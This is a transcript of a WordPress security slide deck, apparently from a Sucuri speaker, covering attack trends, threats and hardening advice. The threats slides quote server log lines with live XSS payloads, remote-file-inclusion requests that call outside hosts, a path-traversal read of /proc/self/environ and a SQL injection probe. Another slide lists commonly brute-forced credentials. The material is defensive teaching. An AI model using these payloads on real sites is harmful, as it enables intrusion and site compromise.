Word press website security
-
Upload
tony-perez -
Category
Documents
-
view
3.010 -
download
1
Transcript of Word press website security
![Page 1: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/1.jpg)
Trends, Threats, Defenses
WordPress Website Security
![Page 2: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/2.jpg)
04/11/2023
root@web # WHOIS PEREZBOX
Specialization: Website Security Incident Handling Log Analysis
Special Interests: Warfare Weapons Martial Arts
Tony Perez | @perezbox | @sucuri_security 2
![Page 3: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/3.jpg)
04/11/2023
Website Security Company
Global Operations
All Website Platforms
Scan 1M Unique Domains a Month
Block 1M web attacks a Month
300 – 500 websites a day
Signature / Heuristic Based
24/5 - 18/2 operations
Tony Perez | @perezbox | @sucuri_security 3
![Page 4: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/4.jpg)
04/11/2023
Today’s Discussion
Trends Threats Defenses
Tony Perez | @perezbox | @sucuri_security 4
SIMPLE RIGHT?
![Page 5: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/5.jpg)
04/11/2023
Trends
Tony Perez | @perezbox | @sucuri_security 5
![Page 6: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/6.jpg)
04/11/2023
Explosion in Web Malicious Links
Tony Perez | @perezbox | @sucuri_security 6
Malicious Links
20112012
600%
![Page 7: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/7.jpg)
04/11/2023
Malicious Links?
Tony Perez | @perezbox | @sucuri_security 7
Malicious
Links
Social Media
Email Links Website
Text Messag
es
![Page 8: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/8.jpg)
04/11/2023
The Web Is The Source
Known MalwareUnkown Malware
Tony Perez | @perezbox | @sucuri_security 8
90%
![Page 9: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/9.jpg)
04/11/2023
What’s a Good Host?
Not InfectedInfected
Tony Perez | @perezbox | @sucuri_security 9
85%
![Page 10: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/10.jpg)
04/11/2023
Malware Type Distribution
Remot
e iF
ram
e In
cludes
Remot
e Ja
vaScr
ipt In
cludes
SPAM In
ject
ions
Obfu
scat
ed /
Enco
ded Ja
vaScr
ipt
Condit
ional
Red
irec
ts
Def
acem
ents
Oth
er
26%
19%16%
14%11%
4%
10%
Tony Perez | @perezbox | @sucuri_security 10
9 Million Unique Domains Scanned
-19 % Infected
![Page 11: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/11.jpg)
04/11/2023
Targeting Environments
Tony Perez | @perezbox | @sucuri_security 11
Apache
SSH Email Server
Going Deeper than the application layer, targeting the server.
Server Polymorphism – a.k.a changes a lot
![Page 12: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/12.jpg)
04/11/2023
Exploiting Forms
Stick With Reputable Sources
Gravity Forms
JetPack Forms
Generating SPAM emails, resource hogs
IP blacklisting
Leverage CaptchasTony Perez | @perezbox | @sucuri_security 12
![Page 13: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/13.jpg)
04/11/2023
Spear Phishing / Phishing Increase
Tony Perez | @perezbox | @sucuri_security 13
55% of Companies have fallen victim
![Page 14: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/14.jpg)
04/11/2023
Search Engine Poisoning (SEP)
Pharmacy Payday Loans
Tony Perez | @perezbox | @sucuri_security 14
![Page 15: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/15.jpg)
04/11/2023
Automated Attacks
WP-Admin
Editor / Widgets / Posts
Payload
Tony Perez | @perezbox | @sucuri_security 15
Access – so easy, yet so weak
![Page 16: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/16.jpg)
04/11/2023
Brute Force Attacks
Tony Perez | @perezbox | @sucuri_security 16
![Page 17: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/17.jpg)
04/11/2023
April Brute Force Attacks
Tony Perez | @perezbox | @sucuri_security 17
![Page 18: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/18.jpg)
04/11/2023
Cross-Site Contamination
Tony Perez | @perezbox | @sucuri_security 18
Site 1
Site 2Site 3
Site 4WordPress 2.8
WordPress 3.5.1
WordPress 3.4.2
WordPress 3.0
![Page 19: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/19.jpg)
04/11/2023
iFrame Injections
Tony Perez | @perezbox | @sucuri_security 19
![Page 20: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/20.jpg)
04/11/2023
Drive By Downloads
Tony Perez | @perezbox | @sucuri_security 20
![Page 21: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/21.jpg)
04/11/2023
Targeting Java Zero Days
Tony Perez | @perezbox | @sucuri_security 21
![Page 22: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/22.jpg)
04/11/2023
Targeting Mobile Devices
Tony Perez | @perezbox | @sucuri_security 22
![Page 23: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/23.jpg)
04/11/2023
Google is On Fire
Tony Perez | @perezbox | @sucuri_security 23
![Page 24: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/24.jpg)
04/11/2023
Exploiting Trust
Tony Perez | @perezbox | @sucuri_security 24
![Page 25: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/25.jpg)
04/11/2023
Latest Plugin Issues
W3TC & WP Super Cache Remote Command Execution (RCE)
Vulnerability
WPMM SPAM Injections (Bad Plugin)
Social Media Widget SPAM Injections (Core Commit)
Tony Perez | @perezbox | @sucuri_security 25
![Page 26: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/26.jpg)
04/11/2023
There’s a Tool for that
Explosion in the Malware as a Service (MaaS) trade Yes, pay someone to hack
for you
Different tools to break in and generate payloads Brute force and
vulnerability exploits Malware Payloads
Blackhole Exploit Kit – Today’s market leader 2013 – SophoLabs
Tony Perez | @perezbox | @sucuri_security 26
![Page 27: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/27.jpg)
04/11/2023
Don’t Worry, Everyone is a Target
Tony Perez | @perezbox | @sucuri_security 27
![Page 28: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/28.jpg)
04/11/2023 Tony Perez | @perezbox | @sucuri_security 28
![Page 29: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/29.jpg)
04/11/2023
Threats
Tony Perez | @perezbox | @sucuri_security 29
![Page 30: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/30.jpg)
04/11/2023
Anatomy of Web Attacks
Recon Identify Attack Sustai
n
Tony Perez | @perezbox | @sucuri_security 30
Use for malware? Burrow into network? Steal data?
What kind of website do you have?
![Page 31: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/31.jpg)
04/11/2023
Cross-Site Scripting (XSS)
Tony Perez | @perezbox | @sucuri_security 31
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
Stored Reflective
![Page 32: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/32.jpg)
04/11/2023
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0”
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6”
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
Remote / Local File Inclusion (RFI)
Tony Perez | @perezbox | @sucuri_security 32
![Page 33: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/33.jpg)
04/11/2023
SQL Injection
Tony Perez | @perezbox | @sucuri_security 33
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”
![Page 34: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/34.jpg)
04/11/2023
Spear Phishing
Tony Perez | @perezbox | @sucuri_security 34
![Page 35: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/35.jpg)
04/11/2023
Backdoors
Tony Perez | @perezbox | @sucuri_security 35
![Page 36: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/36.jpg)
04/11/2023
What’s all this mean?
Brand Reputation Legal Implications Impact to Sales Blacklisted by
Search Engines Blacklisted by
Payment processors Worst Day Of your
Life
Tony Perez | @perezbox | @sucuri_security 36
![Page 37: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/37.jpg)
04/11/2023
Defenses
Tony Perez | @perezbox | @sucuri_security 37
![Page 38: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/38.jpg)
04/11/2023
Areas to Focus On
Access Control Vulnerabilities Hosting Online Habits Social Media Passwords
Tony Perez | @perezbox | @sucuri_security 38
![Page 39: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/39.jpg)
04/11/2023
Manage our own expectations
“It’s about risk reduction… risk will never be zero…”
Tony Perez | @perezbox | @sucuri_security 39
![Page 40: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/40.jpg)
04/11/2023
The Foundation
We run on WordPress Current Version of course
Sucuri properties suffer: ~125,000 web based
attacks a month on average
~4,000 attacks a day▪ This spikes on occasion
Doesn’t include server level attacks
All flavors of attacks
Tony Perez | @perezbox | @sucuri_security 40
![Page 41: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/41.jpg)
04/11/2023
Defense in Depth Approach Instead of telling you what you need to do,
I’ll just tell you what we do;
Our philosophy and approach is very simple, complex things break in complex ways;
We focus on the areas that we can immediately control;
We believe in layered defenses;Tony Perez | @perezbox | @sucuri_security 41
![Page 42: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/42.jpg)
04/11/2023
What we do…for websites
Tony Perez | @perezbox | @sucuri_security 42
Stay Current
IP Whitelisting
Two Factor Authentication
Strong / Unique Password
Web Application Firewall
![Page 43: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/43.jpg)
04/11/2023
What we do…for Servers
Tony Perez | @perezbox | @sucuri_security 43
IP Whitelisting
Server Isolation
Public Key Authentication
Host Intrusion Detection System (HIDS)
Log Everything
![Page 44: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/44.jpg)
04/11/2023
My Personal Configurations.. Tools..
Category Tool Type
Prevention – Software Vulnerabilities Sucuri CloudProxy Service
Prevention – Access Control Sucuri CloudProxy Service
Detection Sucuri Monitoring Service
Remediation Sucuri Service
Password Management 1Password / LastPass Application
Host-based Intrusion Detection System
OSSEC Application
Access Control Enforcement Login Secure Solutions
Plugin
Two-Factor Authentication Google Authenticator Plugin
Application Auditing Sucuri Premium Plugin
Backups BackupBuddy Plugin
Tony Perez | @perezbox | @sucuri_security 44
![Page 45: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/45.jpg)
04/11/2023
My Personal Configurations… cntd..
Tony Perez | @perezbox | @sucuri_security 45
Category Location Type
Disable Theme / Plugin Editor
wp-config.php Preventive measure
Disable PHP execution .htacces – uploads / images / wp-includes / etc..
Preventive measure
Permissions Directories 755 / Files 644
Preventive measure
![Page 46: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/46.jpg)
04/11/2023
Hosting
Tony Perez | @perezbox | @sucuri_security 46
• Don’t know what you’re doing?• Go with a managed host…
![Page 47: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/47.jpg)
04/11/2023
Managed Hosting Options
Tony Perez | @perezbox | @sucuri_security 47
Doesn’t mean you won’t ever get infected.
![Page 48: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/48.jpg)
04/11/2023
Passwords
Complex . Long . Unique . Esoteric
“CLUE”
Tony Perez | @perezbox | @sucuri_security 48
652,911 [log] => admin10173 [log] => test8992 [log] => administrator8921 [log] => Admin2495 [log] => root
16,798 [pwd] => admin10,880 [pwd] => 1234569,727 [pwd] => 6666669,106 [pwd] => 1111117,882 [pwd] => 123456787,717 [pwd] => qwerty7,295 [pwd] => 1234567
USERNAMES PASSWORDSEpic Fail
![Page 49: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/49.jpg)
04/11/2023
Notable Plugins
Access Login Secure Solution Stealth Login Limit Login
Scanning WordFence Anti-Malwatch
Defense in Depth Better WP Security BulletProof Security
Vulnerabilities MVIS Security Center
Tony Perez | @perezbox | @sucuri_security 49
![Page 50: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/50.jpg)
04/11/2023
Notable Resources
Tony Perez | @perezbox | @sucuri_security 50
Name Tool
Sucuri Blog http://blog.sucuri.net
Sucuri TV http://sucuri.tv
WordPress Forum – Hacked http://wordpress.org/tags/hacked
WordPress Forum – Malware http://wordpress.org/tags/malware
Badware Busters https://badwarebusters.org
Perishable Press http://perishablepress.com/category/web-design/security/
Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
WordPress.org Hardening http://codex.wordpress.org/Hardening_WordPress
Google Webmaster Tools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
Secunia Security Advisories http://secunia.com/community/advisories/search/?search=wordpress
Exploit-DB http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
![Page 51: Word press website security](https://reader036.fdocuments.us/reader036/viewer/2022062513/554bcce9b4c905706a8b488d/html5/thumbnails/51.jpg)
04/11/2023
Thanks
Tony Perez | @perezbox | @sucuri_security 51